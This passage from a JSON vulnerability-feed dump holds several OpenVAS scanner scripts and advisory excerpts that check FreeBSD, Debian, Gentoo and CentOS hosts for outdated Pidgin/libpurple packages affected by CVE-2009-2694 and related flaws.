\"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"finch\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package finch version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64784", "href": "http://plugins.openvas.org/nasl.php?oid=64784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "sourceData": "#\n#VID 59e7af2d-8db7-11de-883b-001e3300a30d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 59e7af2d-8db7-11de-883b-001e3300a30d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n finch\n\nCVE-2009-2694\nThe msn_slplink_process_msg function in\nlibpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\n(formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\nremote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) by sending multiple\ncrafted SLP (aka MSNSLP) messages to trigger an overwrite of an\narbitrary memory location. NOTE: this issue reportedly exists because\nof an incomplete fix for CVE-2009-1376.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/36384/\nhttp://www.pidgin.im/news/security/?id=34\nhttp://www.vuxml.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64784);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: pidgin, libpurple, finch\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"finch\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package finch version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064753", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1870_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1870-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Federico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the Allow only the users below setting are not vulnerable\nto this attack. If you can't install the below updates you may want to\nset this via Tools->Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201870-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64753\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1870-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "modified": "2017-07-07T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64753", "href": "http://plugins.openvas.org/nasl.php?oid=64753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1870_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1870-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Federico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the Allow only the users below setting are not vulnerable\nto this attack. If you can't install the below updates you may want to\nset this via Tools->Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201870-1\";\n\n\nif(description)\n{\n script_id(64753);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1870-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200910-02.", "modified": "2018-04-06T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:136141256231066109", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066109", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200910-02 (pidgin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in Pidgin, leading to the\n remote execution of arbitrary code, unauthorized information\ndisclosure, or\n Denial of Service.\";\ntag_solution = \"All Pidgin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-im/pidgin-2.5.9-r1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200910-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=276000\nhttp://bugs.gentoo.org/show_bug.cgi?id=281545\nhttp://bugs.gentoo.org/show_bug.cgi?id=283324\nhttp://www.gentoo.org/security/en/glsa/glsa-200905-07.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200910-02.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66109\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200910-02 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/pidgin\", unaffected: make_list(\"ge 2.5.9-r1\"), vulnerable: make_list(\"lt 2.5.9-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200910-02.", "modified": "2017-07-07T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:66109", "href": "http://plugins.openvas.org/nasl.php?oid=66109", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200910-02 (pidgin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in Pidgin, leading to the\n remote execution of arbitrary code, unauthorized information\ndisclosure, or\n Denial of Service.\";\ntag_solution = \"All Pidgin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-im/pidgin-2.5.9-r1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200910-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=276000\nhttp://bugs.gentoo.org/show_bug.cgi?id=281545\nhttp://bugs.gentoo.org/show_bug.cgi?id=283324\nhttp://www.gentoo.org/security/en/glsa/glsa-200905-07.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200910-02.\";\n\n \n \n\nif(description)\n{\n script_id(66109);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200910-02 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/pidgin\", unaffected: make_list(\"ge 2.5.9-r1\"), vulnerable: make_list(\"lt 2.5.9-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64789", "href": "http://plugins.openvas.org/nasl.php?oid=64789", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1218 (pidgin)", "sourceData": "#CESA-2009:1218 64789 4\n# $Id: ovcesa2009_1218.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1218 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1218\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1218\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html\";\ntag_summary = \"The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.\";\n\n\n\nif(description)\n{\n script_id(64789);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1218 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~1.5.1~4.el3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1218.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security 